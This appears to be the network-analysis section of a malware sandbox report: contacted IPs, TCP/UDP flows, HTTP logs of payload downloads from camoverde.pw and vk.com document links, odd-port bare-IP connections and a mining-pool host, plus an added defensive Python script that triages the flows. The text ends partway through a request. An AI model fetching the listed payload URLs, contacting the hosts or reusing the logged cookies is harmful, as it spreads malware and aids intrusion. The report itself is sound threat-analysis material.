Network Analysis
IP Address | Status | Action |
---|---|---|
103.100.211.218 | Active | Moloch |
104.17.214.67 | Active | Moloch |
104.192.141.1 | Active | Moloch |
104.21.0.171 | Active | Moloch |
104.26.4.15 | Active | Moloch |
104.26.9.59 | Active | Moloch |
121.254.136.57 | Active | Moloch |
147.135.165.22 | Active | Moloch |
148.251.234.83 | Active | Moloch |
148.251.234.93 | Active | Moloch |
154.221.26.108 | Active | Moloch |
156.236.72.121 | Active | Moloch |
157.254.164.98 | Active | Moloch |
163.123.143.4 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.217.25.4 | Active | Moloch |
172.67.26.14 | Active | Moloch |
172.67.75.166 | Active | Moloch |
176.113.115.135 | Active | Moloch |
176.113.115.136 | Active | Moloch |
176.113.115.84 | Active | Moloch |
176.113.115.85 | Active | Moloch |
185.253.96.117 | Active | Moloch |
194.169.175.128 | Active | Moloch |
194.169.175.138 | Active | Moloch |
194.26.135.162 | Active | Moloch |
208.67.104.60 | Active | Moloch |
213.91.128.133 | Active | Moloch |
23.81.68.42 | Active | Moloch |
34.117.59.81 | Active | Moloch |
45.12.253.74 | Active | Moloch |
45.143.201.238 | Active | Moloch |
45.15.156.229 | Active | Moloch |
46.173.215.12 | Active | Moloch |
62.122.184.92 | Active | Moloch |
77.91.124.40 | Active | Moloch |
77.91.68.3 | Active | Moloch |
77.91.68.56 | Active | Moloch |
80.66.75.254 | Active | Moloch |
80.66.75.4 | Active | Moloch |
87.120.88.198 | Active | Moloch |
87.240.137.164 | Active | Moloch |
91.215.85.147 | Active | Moloch |
94.142.138.113 | Active | Moloch |
95.142.206.0 | Active | Moloch |
95.142.206.2 | Active | Moloch |
- TCP Requests

Source | Destination | Host |
---|---|---|
175.208.134.153:52587 | 192.168.56.102:5911 | |
192.168.56.102:49250 | 103.100.211.218:80 | us.imgjeoigaa.com |
192.168.56.102:49262 | 104.17.214.67:80 | www.maxmind.com |
192.168.56.102:49263 | 104.17.214.67:443 | www.maxmind.com |
192.168.56.102:49264 | 104.17.214.67:443 | www.maxmind.com |
192.168.56.102:49191 | 104.192.141.1:80 | bitbucket.org |
192.168.56.102:49197 | 104.192.141.1:80 | bitbucket.org |
192.168.56.102:49201 | 104.192.141.1:80 | bitbucket.org |
192.168.56.102:49204 | 104.192.141.1:443 | bitbucket.org |
192.168.56.102:49208 | 104.192.141.1:443 | bitbucket.org |
192.168.56.102:49212 | 104.192.141.1:443 | bitbucket.org |
192.168.56.102:49192 | 104.21.0.171:80 | camoverde.pw |
192.168.56.102:49193 | 104.21.0.171:80 | camoverde.pw |
192.168.56.102:49194 | 104.21.0.171:80 | camoverde.pw |
192.168.56.102:49196 | 104.21.0.171:443 | camoverde.pw |
192.168.56.102:49259 | 104.26.4.15:443 | db-ip.com |
192.168.56.102:49173 | 104.26.9.59:443 | api.myip.com |
192.168.56.102:49198 | 121.254.136.57:80 | apps.identrust.com |
192.168.56.102:49268 | 147.135.165.22:38685 | |
192.168.56.102:49265 | 148.251.234.83:443 | iplogger.org |
192.168.56.102:49266 | 148.251.234.83:443 | iplogger.org |
192.168.56.102:49260 | 148.251.234.93:443 | iplis.ru |
192.168.56.102:49261 | 148.251.234.93:443 | iplis.ru |
192.168.56.102:49258 | 154.221.26.108:80 | aa.imgjeoogbb.com |
192.168.56.102:49205 | 156.236.72.121:80 | zzz.fhauiehgha.com |
192.168.56.102:49270 | 157.254.164.98:28449 | |
192.168.56.102:49287 | 172.217.25.4:80 | www.google.com |
192.168.56.102:49288 | 172.217.25.4:80 | www.google.com |
192.168.56.102:49289 | 172.217.25.4:80 | www.google.com |
192.168.56.102:49290 | 172.217.25.4:80 | www.google.com |
192.168.56.102:49291 | 172.217.25.4:80 | www.google.com |
192.168.56.102:49292 | 172.217.25.4:80 | www.google.com |
192.168.56.102:49293 | 172.217.25.4:80 | www.google.com |
192.168.56.102:49294 | 172.67.26.14:443 | api.telnyx.com |
192.168.56.102:49295 | 172.67.26.14:443 | api.telnyx.com |
192.168.56.102:49297 | 172.67.26.14:443 | api.telnyx.com |
192.168.56.102:49298 | 172.67.26.14:443 | api.telnyx.com |
192.168.56.102:49254 | 172.67.75.166:443 | db-ip.com |
192.168.56.102:49257 | 172.67.75.166:443 | db-ip.com |
176.113.115.135:431 | 192.168.56.102:49284 | |
176.113.115.136:431 | 192.168.56.102:49285 | |
192.168.56.102:49209 | 176.113.115.84:8080 | |
176.113.115.84:431 | 192.168.56.102:49282 | |
176.113.115.85:431 | 192.168.56.102:49286 | |
192.168.56.102:49272 | 185.253.96.117:2227 | |
192.168.56.102:49248 | 194.169.175.128:50500 | |
192.168.56.102:49213 | 194.169.175.138:3002 | |
192.168.56.102:49269 | 194.26.135.162:2920 | |
192.168.56.102:49172 | 208.67.104.60:80 | |
192.168.56.102:49182 | 208.67.104.60:80 | |
192.168.56.102:49249 | 208.67.104.60:80 | |
192.168.56.102:49279 | 213.91.128.133:10060 | fastpool.xyz |
192.168.56.102:49296 | 23.81.68.42:993 | imap.cox.net |
192.168.56.102:49174 | 34.117.59.81:443 | ipinfo.io |
192.168.56.102:49175 | 34.117.59.81:443 | ipinfo.io |
192.168.56.102:49252 | 34.117.59.81:443 | ipinfo.io |
192.168.56.102:49253 | 34.117.59.81:443 | ipinfo.io |
192.168.56.102:49255 | 34.117.59.81:443 | ipinfo.io |
192.168.56.102:49256 | 34.117.59.81:443 | ipinfo.io |
45.143.201.238:431 | 192.168.56.102:49281 | |
192.168.56.102:49251 | 45.15.156.229:80 | |
46.173.215.12:443 | 192.168.56.102:49271 | |
62.122.184.92:431 | 192.168.56.102:49280 | |
192.168.56.102:49188 | 77.91.124.40:80 | |
192.168.56.102:49276 | 77.91.68.3:80 | |
192.168.56.102:49274 | 77.91.68.56:19071 | |
80.66.75.254:487 | 192.168.56.102:49278 | |
80.66.75.4:431 | 192.168.56.102:49283 | |
192.168.56.102:49190 | 87.120.88.198:80 | |
192.168.56.102:49176 | 87.240.137.164:80 | vk.com |
192.168.56.102:49177 | 87.240.137.164:80 | vk.com |
192.168.56.102:49179 | 87.240.137.164:80 | vk.com |
192.168.56.102:49181 | 87.240.137.164:443 | vk.com |
192.168.56.102:49183 | 87.240.137.164:80 | vk.com |
192.168.56.102:49189 | 87.240.137.164:80 | vk.com |
192.168.56.102:49199 | 87.240.137.164:80 | vk.com |
192.168.56.102:49200 | 87.240.137.164:80 | vk.com |
192.168.56.102:49206 | 87.240.137.164:80 | vk.com |
192.168.56.102:49207 | 87.240.137.164:80 | vk.com |
192.168.56.102:49210 | 87.240.137.164:80 | vk.com |
192.168.56.102:49214 | 87.240.137.164:443 | vk.com |
192.168.56.102:49216 | 87.240.137.164:80 | vk.com |
192.168.56.102:49218 | 87.240.137.164:443 | vk.com |
192.168.56.102:49219 | 87.240.137.164:80 | vk.com |
192.168.56.102:49221 | 87.240.137.164:80 | vk.com |
192.168.56.102:49222 | 87.240.137.164:80 | vk.com |
192.168.56.102:49224 | 87.240.137.164:80 | vk.com |
192.168.56.102:49225 | 87.240.137.164:80 | vk.com |
192.168.56.102:49226 | 87.240.137.164:80 | vk.com |
192.168.56.102:49227 | 87.240.137.164:80 | vk.com |
192.168.56.102:49228 | 87.240.137.164:443 | vk.com |
192.168.56.102:49230 | 87.240.137.164:443 | vk.com |
192.168.56.102:49232 | 87.240.137.164:80 | vk.com |
192.168.56.102:49233 | 87.240.137.164:80 | vk.com |
192.168.56.102:49234 | 87.240.137.164:80 | vk.com |
192.168.56.102:49235 | 87.240.137.164:80 | vk.com |
192.168.56.102:49236 | 87.240.137.164:80 | vk.com |
192.168.56.102:49237 | 87.240.137.164:80 | vk.com |
192.168.56.102:49239 | 87.240.137.164:443 | vk.com |
192.168.56.102:49241 | 87.240.137.164:443 | vk.com |
192.168.56.102:49242 | 87.240.137.164:443 | vk.com |
192.168.56.102:49202 | 91.215.85.147:80 | hugersi.com |
192.168.56.102:49243 | 95.142.206.0:443 | sun6-20.userapi.com |
192.168.56.102:49220 | 95.142.206.2:443 | sun6-22.userapi.com |
192.168.56.102:49244 | 95.142.206.2:443 | sun6-22.userapi.com |

The Host column is the name the sandbox resolved for the destination; rows without one are connections straight to an IP address. Rows that show the external address in the Source column still have an ephemeral port (49xxx) on the sandbox side, so they are most plausibly connections the sandbox opened to ports 431, 487 and 443 on those hosts that the sensor recorded in the reply direction.
- UDP Requests

Source | Destination |
---|---|
192.168.56.102:50014 | 164.124.101.2:53 |
192.168.56.102:51405 | 164.124.101.2:53 |
192.168.56.102:51598 | 164.124.101.2:53 |
192.168.56.102:52840 | 164.124.101.2:53 |
192.168.56.102:53208 | 164.124.101.2:53 |
192.168.56.102:53778 | 164.124.101.2:53 |
192.168.56.102:53991 | 164.124.101.2:53 |
192.168.56.102:56630 | 164.124.101.2:53 |
192.168.56.102:57203 | 164.124.101.2:53 |
192.168.56.102:62846 | 164.124.101.2:53 |
192.168.56.102:63564 | 164.124.101.2:53 |
192.168.56.102:63709 | 164.124.101.2:53 |
192.168.56.102:64317 | 164.124.101.2:53 |
192.168.56.102:64513 | 164.124.101.2:53 |
192.168.56.102:65226 | 164.124.101.2:53 |
192.168.56.102:137 | 192.168.56.255:137 |
192.168.56.102:138 | 192.168.56.255:138 |
192.168.56.102:49152 | 239.255.255.250:3702 |
192.168.56.102:58524 | 239.255.255.250:1900 |
52.231.114.183:123 | 192.168.56.102:123 |
8.8.8.8:53 | 192.168.56.102:50447 |
8.8.8.8:53 | 192.168.56.102:51405 |
8.8.8.8:53 | 192.168.56.102:51903 |
8.8.8.8:53 | 192.168.56.102:55774 |
8.8.8.8:53 | 192.168.56.102:57988 |
8.8.8.8:53 | 192.168.56.102:58521 |
8.8.8.8:53 | 192.168.56.102:59651 |
8.8.8.8:53 | 192.168.56.102:60523 |
8.8.8.8:53 | 192.168.56.102:65168 |
8.8.8.8:53 | 192.168.56.102:65226 |
8.8.8.8:53 | 192.168.56.102:65368 |
8.8.8.8:53 | 192.168.56.102:65488 |

The UDP traffic is DNS to 164.124.101.2 and 8.8.8.8 (the 8.8.8.8 rows are the replies, source port 53), NetBIOS and SSDP/WS-Discovery chatter on the local segment, and one NTP exchange with 52.231.114.183.
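The flow lists above are raw sensor output, and the first pass an analyst makes over them is to group by external peer and sort the peers into buckets: the public "what is my IP" services (api.myip.com, ipinfo.io, db-ip.com, maxmind, iplogger.org, iplis.ru), ordinary web and CDN traffic, and bare IP addresses on ports such as 431, 2227, 2920, 3002, 10060, 19071, 28449, 38685 and 50500, which are the candidates for command-and-control or payload hosting. The script below is an added example, not part of this report and not code from the sandbox that produced it. It parses lines in the "source:port destination:port hostname" form used on this page (including the raw form where the hostname is fused onto the destination port), treats 192.168.56.102 and any broadcast or multicast address as local, and labels every external peer. The set of IP-lookup hostnames and the set of unremarkable ports are this example's own assumptions; the sample flows are copied from the lists above.

```python
"""Triage of a sandbox flow list: group flows by external peer and classify each peer.

Added example; not part of the original report. The sandbox VM is 192.168.56.102 and
everything that is not private, multicast or broadcast counts as an external peer.
"""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass, field

# Public "what is my IP / where am I" services seen in the capture (assumed list).
IP_LOOKUP_HOSTS = {"api.myip.com", "ipinfo.io", "db-ip.com", "www.maxmind.com",
                   "iplogger.org", "iplis.ru"}
# Ports treated as unremarkable; anything else, especially on a bare IP, gets flagged.
WELL_KNOWN_PORTS = {53, 80, 123, 443, 993}

# "src:port dst:port [host]"; the host may be fused to the port, as in the raw capture.
FLOW_RE = re.compile(r"^([\d.]+):(\d+)\s+([\d.]+):(\d+)\s*([A-Za-z][\w.-]*)?$")

# Subset of flow lines copied from the lists above (values from the page, not invented).
SAMPLE_FLOWS = """\
192.168.56.102:49173 104.26.9.59:443api.myip.com
192.168.56.102:49174 34.117.59.81:443 ipinfo.io
192.168.56.102:49196 104.21.0.171:443 camoverde.pw
192.168.56.102:49181 87.240.137.164:443 vk.com
192.168.56.102:49268 147.135.165.22:38685
192.168.56.102:49279 213.91.128.133:10060 fastpool.xyz
192.168.56.102:49209 176.113.115.84:8080
176.113.115.84:431 192.168.56.102:49282
192.168.56.102:49172 208.67.104.60:80
8.8.8.8:53 192.168.56.102:50447
192.168.56.102:137 192.168.56.255:137
192.168.56.102:58524 239.255.255.250:1900
"""


@dataclass
class Peer:
    ip: str
    ports: set = field(default_factory=set)   # peer-side ports seen
    hosts: set = field(default_factory=set)   # hostnames resolved to this peer
    inbound: bool = False                     # logged at least once with the peer as source


def parse_flow(line: str):
    """Return (src, sport, dst, dport, host) or None for a line that is not a flow."""
    m = FLOW_RE.match(line.strip())
    if not m:
        return None
    src, sport, dst, dport, host = m.groups()
    return src, int(sport), dst, int(dport), host or ""


def is_local(ip: str) -> bool:
    """Sandbox side: private, link-local, loopback, broadcast or multicast addresses."""
    a = ipaddress.ip_address(ip)
    return a.is_multicast or not a.is_global


def classify(peer: Peer) -> str:
    if peer.hosts & IP_LOOKUP_HOSTS:
        return "ip-lookup"
    if peer.ports == {53}:
        return "dns"
    if peer.ports - WELL_KNOWN_PORTS:
        return "non-standard-port"
    if not peer.hosts:
        return "bare-ip-web"          # HTTP(S) straight to an address, no name resolved
    return "web"


def triage(flow_text: str) -> dict:
    """Group flows by external peer: {ip: {ports, hosts, inbound, class}} in first-seen order."""
    peers: dict[str, Peer] = {}
    for line in flow_text.splitlines():
        parsed = parse_flow(line)
        if parsed is None:
            continue
        src, sport, dst, dport, host = parsed
        src_local, dst_local = is_local(src), is_local(dst)
        if src_local == dst_local:
            continue                  # local/broadcast chatter (or two externals): skip
        ip, port, inbound = (dst, dport, False) if src_local else (src, sport, True)
        peer = peers.setdefault(ip, Peer(ip))
        peer.ports.add(port)
        if host:
            peer.hosts.add(host)
        peer.inbound |= inbound
    return {ip: {"ports": sorted(p.ports), "hosts": sorted(p.hosts),
                 "inbound": p.inbound, "class": classify(p)} for ip, p in peers.items()}


def report(flow_text: str) -> list:
    """One line per peer, most suspicious classes first (stable within a class)."""
    order = ["non-standard-port", "bare-ip-web", "ip-lookup", "web", "dns"]
    rows = triage(flow_text)
    return [f"{r['class']:<17} {ip:<16} ports={r['ports']} hosts={r['hosts']}"
            f"{' inbound' if r['inbound'] else ''}"
            for ip, r in sorted(rows.items(), key=lambda kv: order.index(kv[1]["class"]))]


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_FLOWS)))
```

Run against the full TCP and UDP lists the same way (paste them into SAMPLE_FLOWS or read them from a file); the ordering puts the bare-IP, odd-port peers at the top, which is where the C2 and payload hosts on this capture sit, and pushes the DNS replies from 8.8.8.8 to the bottom.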
GET 200 https://api.myip.com/
Request:
GET / HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: api.myip.com
Response:
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 00:58:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DHTzx7QSKpGWD4%2BtCWtjugRpILB0XuSi4mwtZcsS0xsq6S4ovmJm7NF9ymGL4eqkqwzpPEtE0K4K0FaBvb3u37hPgumS1gqHddgQSDRHXhFhdmnB%2BKNXXqSgbZqdVA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7e86c7709da28385-KIX
GET 200 https://vk.com/doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1
Request:
GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: vk.com
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: kittenx
Date: Tue, 18 Jul 2023 00:58:59 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 240177
Connection: keep-alive
X-Powered-By: KPHP/7.4.114177
Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly
Set-Cookie: remixlang=17; expires=Sat, 20 Jul 2024 13:20:04 GMT; path=/; domain=.vk.com
Set-Cookie: remixstlid=9066415190589096709_7glS0yLxHjgUVDHuM51ZNMCXd8Z91lvtzM3x4OvTXlT; expires=Wed, 17 Jul 2024 00:58:59 GMT; path=/; domain=.vk.com; secure
Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure
Set-Cookie: remixlgck=74ebe3b98cf3ddf455; expires=Sun, 21 Jul 2024 15:37:46 GMT; path=/; domain=.vk.com; secure; HttpOnly
Set-Cookie: remixstid=1927807604_CHdaewi2CJ3TqZk5GaSjFAhw6G1Vx5KRZM5DYfGuhrD; expires=Thu, 11 Jul 2024 06:23:13 GMT; path=/; domain=.vk.com; secure
Cache-control: no-store
X-Robots-Tag: noindex,nofollow
Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp
X-XSS-Protection: 1; report=/xss_reports
X-Frame-Options: deny
X-Frontend: front605106
Strict-Transport-Security: max-age=15768000
Access-Control-Expose-Headers: X-Frontend
GET 200 https://camoverde.pw/setup294.exe
Request:
GET /setup294.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: camoverde.pw
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 00:59:03 GMT
Content-Type: application/x-msdos-program
Content-Length: 1718034
Connection: keep-alive
Last-Modified: Mon, 17 Jul 2023 19:27:53 GMT
ETag: "1a3712-600b3cb774040"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 6242
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7r%2FjcGpl2X4KZpa7AiNMr2P1qHAZKZsZDGukdi%2BfZ6jmVRop%2BhQISI3J8WZifpoWYEIbfHKhTTanJsim1nS5Xj160sA9%2BiSwM9bw7oa4j050Kc3VpdxTbT%2F76GVt%2FTk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7e86c7a39c19834c-KIX
alt-svc: h3=":443"; ma=86400
GET 302 https://vk.com/doc808950829_664207170?hash=kMt7FUJyRMXd3utd25izhIrZbfZfaKJzCnFJqUmY3Sw&dl=uZ3GDnIBuaFj1FCG7xA3gziJZ6Zba8NMATPW6Lqrzb0&api=1&no_preview=1
Request:
GET /doc808950829_664207170?hash=kMt7FUJyRMXd3utd25izhIrZbfZfaKJzCnFJqUmY3Sw&dl=uZ3GDnIBuaFj1FCG7xA3gziJZ6Zba8NMATPW6Lqrzb0&api=1&no_preview=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: vk.com
Cache-Control: no-cache
Cookie: remixlang=17; remixstlid=9066415190589096709_7glS0yLxHjgUVDHuM51ZNMCXd8Z91lvtzM3x4OvTXlT; remixlgck=74ebe3b98cf3ddf455; remixstid=1927807604_CHdaewi2CJ3TqZk5GaSjFAhw6G1Vx5KRZM5DYfGuhrD
Response:
HTTP/1.1 302 Found
Server: kittenx
Date: Tue, 18 Jul 2023 00:59:06 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 0
Connection: keep-alive
X-Powered-By: KPHP/7.4.114177
Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly
Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly
Cache-control: no-store
X-Robots-Tag: noindex,nofollow
Location: https://sun6-22.userapi.com/c237331/u808950829/docs/d28/3a37ed672f4f/PMmp.bmp?extra=gcnGDZKNmUI9ILIZltV-06CxoxiUcVZM6a15nmaWisbkvGbAiySFTZuYmIuvNuKeY7WquRScXXJZm0OToeoDD2hOlbsD_3s2T0lYUV2YTBJCIid2vzPwneGNQMY8ygLXJcaHc_FtHwhbF7oRtg
X-Frontend: front605106
Strict-Transport-Security: max-age=15768000
Access-Control-Expose-Headers: X-Frontend
GET 200 https://sun6-22.userapi.com/c237331/u808950829/docs/d28/3a37ed672f4f/PMmp.bmp?extra=gcnGDZKNmUI9ILIZltV-06CxoxiUcVZM6a15nmaWisbkvGbAiySFTZuYmIuvNuKeY7WquRScXXJZm0OToeoDD2hOlbsD_3s2T0lYUV2YTBJCIid2vzPwneGNQMY8ygLXJcaHc_FtHwhbF7oRtg
Request:
GET /c237331/u808950829/docs/d28/3a37ed672f4f/PMmp.bmp?extra=gcnGDZKNmUI9ILIZltV-06CxoxiUcVZM6a15nmaWisbkvGbAiySFTZuYmIuvNuKeY7WquRScXXJZm0OToeoDD2hOlbsD_3s2T0lYUV2YTBJCIid2vzPwneGNQMY8ygLXJcaHc_FtHwhbF7oRtg HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: sun6-22.userapi.com
Cache-Control: no-cache
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: kittenx
Date: Tue, 18 Jul 2023 00:59:07 GMT
Content-Type: image/x-ms-bmp
Content-Length: 6771716
Connection: keep-alive
Last-Modified: Thu, 13 Jul 2023 11:19:05 GMT
ETag: "64afdda9-675404"
Expires: Thu, 17 Aug 2023 00:59:07 GMT
Cache-Control: max-age=2592000
X-Frontend: front6-22
Access-Control-Expose-Headers: X-Frontend
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, HEAD, OPTIONS
Strict-Transport-Security: max-age=15768000
Access-Control-Allow-Headers: X-Quic
Timing-Allow-Origin: *
Accept-Ranges: bytes
GET 200 https://vk.com/doc808950829_663788437?hash=2eEvnU5tvv0tTTXDhEX8q9Boubn9undHCOt73KTUqzD&dl=EJ05zUitXuxdQoIcYUJ5Zj5KPM6Kzzrdpz0VhUeNkOo&api=1&no_preview=1#WW1
Request:
GET /doc808950829_663788437?hash=2eEvnU5tvv0tTTXDhEX8q9Boubn9undHCOt73KTUqzD&dl=EJ05zUitXuxdQoIcYUJ5Zj5KPM6Kzzrdpz0VhUeNkOo&api=1&no_preview=1#WW1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: vk.com
Cache-Control: no-cache
Cookie: remixlang=17; remixstlid=9066415190589096709_7glS0yLxHjgUVDHuM51ZNMCXd8Z91lvtzM3x4OvTXlT; remixlgck=74ebe3b98cf3ddf455; remixstid=1927807604_CHdaewi2CJ3TqZk5GaSjFAhw6G1Vx5KRZM5DYfGuhrD
Response:
HTTP/1.1 200 OK
Server: kittenx
Date: Tue, 18 Jul 2023 00:59:07 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 240119
Connection: keep-alive
X-Powered-By: KPHP/7.4.114177
Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly
Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure
Cache-control: no-store
X-Robots-Tag: noindex,nofollow
Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp
X-XSS-Protection: 1; report=/xss_reports
X-Frame-Options: deny
X-Frontend: front605106
Strict-Transport-Security: max-age=15768000
Access-Control-Expose-Headers: X-Frontend
GET 200 https://vk.com/doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#stats
Request:
GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#stats HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: vk.com
Cache-Control: no-cache
Cookie: remixlang=17; remixstlid=9066415190589096709_7glS0yLxHjgUVDHuM51ZNMCXd8Z91lvtzM3x4OvTXlT; remixlgck=74ebe3b98cf3ddf455; remixstid=1927807604_CHdaewi2CJ3TqZk5GaSjFAhw6G1Vx5KRZM5DYfGuhrD
Response:
HTTP/1.1 200 OK
Server: kittenx
Date: Tue, 18 Jul 2023 00:59:10 GMT
Content-Type: text/html; charset=windows-1251
Content-Length: 240193
Connection: keep-alive
X-Powered-By: KPHP/7.4.114177
Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly
Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure
Cache-control: no-store
X-Robots-Tag: noindex,nofollow
Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline'
X-XSS-Protection: 1; report=/xss_reports
X-Frame-Options: deny
X-Frontend: front605106
Strict-Transport-Security: max-age=15768000
Access-Control-Expose-Headers: X-Frontend
GET 200 https://vk.com/doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#test
Request:
